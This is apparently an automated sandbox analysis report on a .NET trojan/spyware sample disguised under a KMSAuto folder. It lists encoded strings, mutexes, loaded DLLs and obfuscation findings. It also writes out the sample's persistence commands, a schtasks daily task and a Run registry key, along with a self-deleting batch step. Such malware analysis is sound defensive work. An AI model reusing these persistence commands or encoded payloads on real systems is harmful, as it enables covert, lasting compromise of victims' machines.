'H4sIAAAAAAAEAAXByQ6CMBAA0B/iADNd6JGZoRqXA7EY400WiweCRmyMX+97+VdpIzneyAMWVnocayycUMeFcWRgLPvag7eShQqjXn7ng9rcd/ojTVILv2LLjldqrdvaLFAXZk6UpgfMcJn2CpDjuznJcCzlWa3XP47SEipwAAAA', 'H4sIAAAAAAAEAMspSTYsTMuwSM4rNMoyLzI2yinJKTbJsyjOyEo1KrZINajMTk8rKizIM0kFAF28Kb4rAAAA', 'H4sIAAAAAAAEAAtxNE43za8K8zFxT/MyLXUJLDPJdy5MD3W2dC5xCjW39DAHAOi9REYiAAAA', 'H4sIAAAAAAAEANPSS87PS8tM19HSSy4GEjn5IGZ5Yk5OaglIrKAASGYAcUlFCUQapColCUgkpQAAEUdo4T0AAAA='
            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, oNAgephtBXblQ.csBase64 encoded string: 'H4sIAAAAAAAEAItJzs/Vy8lMSi0qqdTLSqyoiPHMS0mtSE1xcYpJy8xJjY830MuEiKQk6eWklqXmpCQBALyHY/o1AAAA', 'H4sIAAAAAAAEAItJLMnPzUyO8clPTsxRCC7JL0pMT43JSS1LzUlJAgDKQ2GtHQAAAA==', 'H4sIAAAAAAAEAItxL00sSkmM8clPTsxRCC7JL0pMT43JSS1LzUlJAgA2We33HQAAAA==', 'H4sIAAAAAAAEAItxzs/My8/NjIHR5Yk5OaklxQCs8h9VGAAAAA==', 'H4sIAAAAAAAEAEssKMjJTE4syczP06/QzS3WTckv1k2tSE0uLUlMykkFAKom4IQfAAAA', 'H4sIAAAAAAAEAMsoKSkottLXTyzI1CtJzUlNL0rM1csvStdPyi8BABoLIu8cAAAA', 'H4sIAAAAAAAEANMvTs1LcclPLs1NzSuxT85ILInPTLEFAKsueU0WAAAA'
Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, UyzHBiQIUNlENT.cs | Base64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXTyzI1CtJzUlNL0rM1csvStdPyi8BABoLIu8cAAAA', 'H4sIAAAAAAAEANMvTs1L8U0tLk5MT7VPzkgsic9MsQUAJlwKPhUAAAA='
Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, UbVrQXWNvILJi.cs | Base64 encoded string: 'H4sIAAAAAAAEAMstzSnJLEgsKtFPyy/K1U1JLEm0VkjKL81LSSyqtAUAyUCMlh4AAAA=', 'H4sIAAAAAAAEANPVrTao5eVyzs8rSc0r0XXJLC7IL84syczPs1JIyy/K1U1JLEm0VshLzE21VUrJTy7NBSpTslZIy8xJhQhWG9YqIQwIqSxItVKoNgKayctVbQykdEE26OrycgEAzjDM6WsAAAA='
Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, epgqLLdQoFNLhGcg.cs | Base64 encoded string: 'H4sIAAAAAAAEAEvOLy4pLUrUS8kvyUstqcos0EvJydFLzs8tKEotLk5NAQBlAxhYIAAAAA==', 'H4sIAAAAAAAEAEvOLy4pLUrUS8kvyUstqcos0CtISdJLzs8tKEotLk5NAQBhsDSUIAAAAA=='
            Source: 14.2.accc.exe.3449550.0.raw.unpack, WPJHIdWGZYOD.csBase64 encoded string: 'H4sIAAAAAAAEAItJijY0jo1O1K1y1PXw0vUL0I0y0LWMrTYy0zE2rY1JAgA/kBJeIAAAAA==', 'H4sIAAAAAAAEAItJ0khK1jDQiE5M1s3I0s0r0K0yMNK1jK02tqytwRA0tazVrDHEELbQsTCv1dSMSQIAmnZO4E4AAAA=', 'H4sIAAAAAAAEAItJMqiITtRNc9R1M9C1jK02MaiNSQIAq44emBUAAAA=', 'H4sIAAAAAAAEAItJijaxiI020LV0dIqNNgRSuh5eun4BulGJutm5ulWx1ZbGtTFJAKXtzMonAAAA', 'H4sIAAAAAAAEAItJco820LVM1K1y1I2KrTY1rY1JAgBrh5bZFAAAAA==', 'H4sIAAAAAAAEAItJKoouKijOyEtMM7Ysdwp18XN19/Dy9vE1CQgMCg4xDwuPiIwySkpOSXVONzPNys61yHcrzDQsKS1zrKisiq02MtExNqmNSQIAQVwclkgAAAA=', 'H4sIAAAAAAAEAItJcow20LVM1K1y1I2KrTY2ro1JAgCSkcF9FAAAAA==', 'H4sIAAAAAAAEAItJ0tBIyixJzs/MS04szrDStNcorCnQjE7UrTLQtYytNjGs1YxJAgBI3BA7JgAAAA==', 'H4sIAAAAAAAEAItJivbxjY1O1M3O1a1y1PXw0vUL0I0y1LWMrTYy0zE2ro1JAgBbyj43IwAAAA==', 'H4sIAAAAAAAEAItJcqk2rI021bV01PXw0vUL0A2NBQkYIgSiEnWzc3WrYquNjWpjkgArcHyrMQAAAA==', 'H4sIAAAAAAAEAItJiog21LV01PXw0vUL0I1K1M3O1a2KrTY2ro1JAgANsrq/HQAAAA==', 'H4sIAAAAAAAEAItJColO1K1y1I0y0LWMrTay0DE2ro1JAgCQuGQ4FwAAAA==', 'H4sIAAAAAAAEAItJKjGMNtC1dNStiq02Nq6NSQIA8OfYfRIAAAA=', 'H4sIAAAAAAAEAItJ0kjKS9LUiE7UrTLQtYytNras1YxJAgAS93gFFwAAAA=='
            Source: 14.2.accc.exe.3449550.0.raw.unpack, wpOcuqWsqP.csBase64 encoded string: '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
            Source: 14.2.accc.exe.3449550.0.raw.unpack, ltCqRsWfGmt.csBase64 encoded string: 'H4sIAAAAAAAEAAvOTyspTyxKjfHNTC7KLwbyYsIz81Lyy4tjnEuLilLzSsJSi4oz8/NigkrzAHLTHVUtAAAA'
            Source: 14.2.accc.exe.3449550.0.raw.unpack, ctleIqXFerYnq.csBase64 encoded string: 'H4sIAAAAAAAEADNNNDGucs7MLwxzKjbx9ynOLPSPDLQsM3XJcPUxL3P2AgDiONk/IAAAAA==', 'H4sIAAAAAAAEADM3NjKzNDAwMDaxcnR0TzNzjTIO9TW3DPBOSzbzCa9wLtQNMigwKi/PdTTwq8wHANMNQhsuAAAA', 'H4sIAAAAAAAEAGWPT0rDQBjF94Xe4buB++xCM9JAwGBSim5ceQFdDkJrKwgKxSotFqSbHmAMRqPRnOF9V/AC9gh+39Q/oLuZN+/93pv1cjWjOAqIbLcfRyft1np5taLe8eFRQLaXmd2048XrM8INHJ/CEY94qAe8oUGBF1RbeJK3gUiPKEWueCLxKMyNhN8Xtx/VhGwa5l1/nekVU5Q8JNyjQo0Hwdos3je+bD4lLNDwucBqvtQGEqrDsxiFzxekinTi1fd9aQXx2LtqOOnfjhOTCRB3v1E1oiRB/sEXMkU+NpZVAzU0smwDd0G7ZTs76d5BP0wSkytx/lOt6zfr/kE1l5n8O/YJ69jp2GwBAAA=', 'H4sIAAAAAAAEAEtKNiwsLs9NKUuuLK9Kzi2oqEiuKCxLNU03SE/NM89ONy5JNKs0LarMSwUAr2cj/yoAAAA=', 'H4sIAAAAAAAEAA3KyQ2AIBAAwIZ8IIfYDqywJBwBJFzV67xHw1neEZ8Oa2yIeU6YpRuBBE2SHllT1xJ1JXPov6LzwbZNqeDUdgIsMD/FXdEolF1myiM6+QEXjvtIVQAAAA==', 'H4sIAAAAAAAEAHMxL3XySPMKyvX2S05OCTQrLA4r9EhxC/T28gk38ipILHMFANZUwu0iAAAA', 'H4sIAAAAAAAEAAXByQ6CMBAA0B/iADNd6JGZoRqXA7EY400WiweCRmyMX+97+VdpIzneyAMWVnocayycUMeFcWRgLPvag7eShQqjXn7ng9rcd/ojTVILv2LLjldqrdvaLFAXZk6UpgfMcJn2CpDjuznJcCzlWa3XP47SEipwAAAA', 'H4sIAAAAAAAEAMspSTYsTMuwSM4rNMoyLzI2yinJKTbJsyjOyEo1KrZINajMTk8rKizIM0kFAF28Kb4rAAAA', 'H4sIAAAAAAAEAAtxNE43za8K8zFxT/MyLXUJLDPJdy5MD3W2dC5xCjW39DAHAOi9REYiAAAA', 'H4sIAAAAAAAEANPSS87PS8tM19HSSy4GEjn5IGZ5Yk5OaglIrKAASGYAcUlFCUQapColCUgkpQAAEUdo4T0AAAA='
            Source: 14.2.accc.exe.3449550.0.raw.unpack, oNAgephtBXblQ.csBase64 encoded string: 'H4sIAAAAAAAEAItJzs/Vy8lMSi0qqdTLSqyoiPHMS0mtSE1xcYpJy8xJjY830MuEiKQk6eWklqXmpCQBALyHY/o1AAAA', 'H4sIAAAAAAAEAItJLMnPzUyO8clPTsxRCC7JL0pMT43JSS1LzUlJAgDKQ2GtHQAAAA==', 'H4sIAAAAAAAEAItxL00sSkmM8clPTsxRCC7JL0pMT43JSS1LzUlJAgA2We33HQAAAA==', 'H4sIAAAAAAAEAItxzs/My8/NjIHR5Yk5OaklxQCs8h9VGAAAAA==', 'H4sIAAAAAAAEAEssKMjJTE4syczP06/QzS3WTckv1k2tSE0uLUlMykkFAKom4IQfAAAA', 'H4sIAAAAAAAEAMsoKSkottLXTyzI1CtJzUlNL0rM1csvStdPyi8BABoLIu8cAAAA', 'H4sIAAAAAAAEANMvTs1LcclPLs1NzSuxT85ILInPTLEFAKsueU0WAAAA'
            Source: 14.2.accc.exe.3449550.0.raw.unpack, UyzHBiQIUNlENT.csBase64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXTyzI1CtJzUlNL0rM1csvStdPyi8BABoLIu8cAAAA', 'H4sIAAAAAAAEANMvTs1L8U0tLk5MT7VPzkgsic9MsQUAJlwKPhUAAAA='
            Source: 14.2.accc.exe.3449550.0.raw.unpack, UbVrQXWNvILJi.csBase64 encoded string: 'H4sIAAAAAAAEAMstzSnJLEgsKtFPyy/K1U1JLEm0VkjKL81LSSyqtAUAyUCMlh4AAAA=', 'H4sIAAAAAAAEANPVrTao5eVyzs8rSc0r0XXJLC7IL84syczPs1JIyy/K1U1JLEm0VshLzE21VUrJTy7NBSpTslZIy8xJhQhWG9YqIQwIqSxItVKoNgKayctVbQykdEE26OrycgEAzjDM6WsAAAA='
            Source: 14.2.accc.exe.3449550.0.raw.unpack, epgqLLdQoFNLhGcg.csBase64 encoded string: 'H4sIAAAAAAAEAEvOLy4pLUrUS8kvyUstqcos0EvJydFLzs8tKEotLk5NAQBlAxhYIAAAAA==', 'H4sIAAAAAAAEAEvOLy4pLUrUS8kvyUstqcos0CtISdJLzs8tKEotLk5NAQBhsDSUIAAAAA=='
            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, kOdtKywYGaUi.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, kOdtKywYGaUi.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 14.2.accc.exe.3449550.0.raw.unpack, kOdtKywYGaUi.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 14.2.accc.exe.3449550.0.raw.unpack, kOdtKywYGaUi.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@22/19@1/1
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nobtpajdjthawd.exe.log
            Source: C:\ProgramData\KMSAuto\accc.exe | Mutant created: NULL
            Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7292
            Source: C:\ProgramData\KMSAuto\accc.exe | Mutant created: \Sessions\1\BaseNamedObjects\5a43zCioqVBs4OLsiqOYQ9v5DhEL7vCJ
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1008:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1252
            Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5148
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | File created: C:\Users\user\AppData\Local\Temp\tmp5337.tmp
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5337.tmp.bat""
            Source: nobtpajdjthawd.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: nobtpajdjthawd.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: nobtpajdjthawd.exe | ReversingLabs: Detection: 81%
            Source: nobtpajdjthawd.exe | Virustotal: Detection: 72%
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | File read: C:\Users\user\Desktop\nobtpajdjthawd.exe
            Source: unknown | Process created: C:\Users\user\Desktop\nobtpajdjthawd.exe "C:\Users\user\Desktop\nobtpajdjthawd.exe"
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Process created: C:\Users\user\Desktop\nobtpajdjthawd.exe "C:\Users\user\Desktop\nobtpajdjthawd.exe"
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7292 -s 800
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 12:56 /du 23:59 /sc daily /ri 1 /f
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe"
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Process created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe"
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5337.tmp.bat""
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 7
            Source: C:\ProgramData\KMSAuto\accc.exe | Process created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe"
            Source: C:\ProgramData\KMSAuto\accc.exe | Process created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe"
            Source: C:\ProgramData\KMSAuto\accc.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 780
            Source: C:\ProgramData\KMSAuto\accc.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1252 -s 764
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: mscoree.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: apphelp.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: kernel.appcore.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: version.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
            Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: uxtheme.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: windows.storage.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: wldp.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: profapi.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: sspicli.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: cryptsp.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: rsaenh.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: cryptbase.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: rasapi32.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: rasman.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: rtutils.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: dwrite.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: mswsock.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: winhttp.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: iphlpapi.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: dhcpcsvc.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: dnsapi.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: winnsi.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: rasadhlp.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: fwpuclnt.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: secur32.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: schannel.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: mskeyprotect.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: ntasn1.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: ncrypt.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: ncryptsslp.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: msasn1.dll
            Source: C:\ProgramData\KMSAuto\accc.exe | Section loaded: gpapi.dll
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: nobtpajdjthawd.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: nobtpajdjthawd.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: nobtpajdjthawd.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb source: nobtpajdjthawd.exe, accc.exe.1.dr
            Source: Binary string: System.Windows.Forms.pdbac source: WER6131.tmp.dmp.25.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: Portals.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: costura.dotnetzip.pdb.compressed source: nobtpajdjthawd.exe, 00000000.00000002.1277019771.00000000041E9000.00000004.00000800.00020000.00000000.sdmp, nobtpajdjthawd.exe, 00000001.00000002.1309844260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, accc.exe, 0000000E.00000002.1417102381.0000000003449000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000014.00000002.1364848533.0000000003247000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000014.00000002.1364848533.0000000003251000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: System.ni.pdbRSDS source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: Portals.pdb@\ source: WER5E53.tmp.dmp.23.dr
            Source: Binary string: mscorlib.ni.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: System.pdb) source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: costura.dotnetzip.pdb.compressed|||DotNetZip.pdb|565BABCBCD978AF66FE1150CC58FDEAFC9815822|622080 source: nobtpajdjthawd.exe, 00000000.00000002.1277019771.00000000041E9000.00000004.00000800.00020000.00000000.sdmp, nobtpajdjthawd.exe, 00000001.00000002.1309844260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, accc.exe, 0000000E.00000002.1417102381.0000000003449000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb<;V; H;_CorExeMainmscoree.dll source: nobtpajdjthawd.exe, accc.exe.1.dr
            Source: Binary string: q costura.dotnetzip.pdb.compressedlB source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000013.00000002.3636637468.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000014.00000002.1364848533.0000000003251000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: p.pdb.compressed source: accc.exe, 00000014.00000002.1364848533.0000000003251000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.dotnetzip.pdb.compressed@\ source: accc.exe, 00000014.00000002.1364848533.0000000003251000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: System.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr

            Data Obfuscation

            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, epgqLLdQoFNLhGcg.cs | .Net Code: JxgpOEMBqDPNJ System.Reflection.Assembly.Load(byte[])
            Source: 14.2.accc.exe.3449550.0.raw.unpack, epgqLLdQoFNLhGcg.cs | .Net Code: JxgpOEMBqDPNJ System.Reflection.Assembly.Load(byte[])
            Source: nobtpajdjthawd.exe | Static PE information: 0xADFF511F [Mon Jul 3 22:20:15 2062 UTC]
            Source: nobtpajdjthawd.exe | Static PE information: section name: .CSS
            Source: accc.exe.1.dr | Static PE information: section name: .CSS
            Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_05A8B5C0 push 4405A5E2h; retf 19_2_05A8B83D
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | File created: C:\ProgramData\KMSAuto\accc.exe

            Boot Survival

            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 12:56 /du 23:59 /sc daily /ri 1 /f
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tools
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
